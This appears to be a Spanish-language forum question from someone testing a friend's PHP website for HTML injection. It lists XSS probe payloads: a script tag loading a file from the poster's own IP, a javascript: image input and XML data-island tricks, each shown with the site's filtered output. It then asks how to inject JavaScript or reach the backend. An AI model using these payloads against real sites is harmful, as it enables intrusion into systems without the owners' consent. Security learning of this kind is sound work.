Estoy practicando inyección de HTML en el sitio web de mis amigos (él sabe que estoy practicando). Así que encontré una vulnerabilidad si escribo <!---->
en el cuadro de búsqueda, el nombre de usuario o la contraseña del sitio web lo ignora. y practiqué algunas etiquetas en el cuadro de búsqueda como <script>, <styles>, <link>
e ignoré el sitio web (o no sé qué hace con ellas).
Así que escribí esto en el cuadro de búsqueda <script src=[myip]/tmp.js></script>
y cuando hice esto como consulta dio el resultado Error: Please enter a query to search.
y en ese archivo tmp.js
había un simple alert('hey');
pero el sitio web no apareció hey
.
Así que probé otras inyecciones de diferentes sitios web y obtuve estas como salida (todo en el cuadro de búsqueda)
INPUT: <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
OUTPUT: Results for "<input type="image" src="denied:javascript:alert('XSS');">"
2)
INPUT: "<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
OUTPUT: Results for """"
3)
INPUT: "<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
OUTPUT: Results for ""<span></span>""
Pregunta: ¿el sitio web es vulnerable? ¿Puedo inyectar javascript o puedo ingresar al backend de alguna manera? ¿O debería inyectar algo más? (el sitio web usa PHP como backend)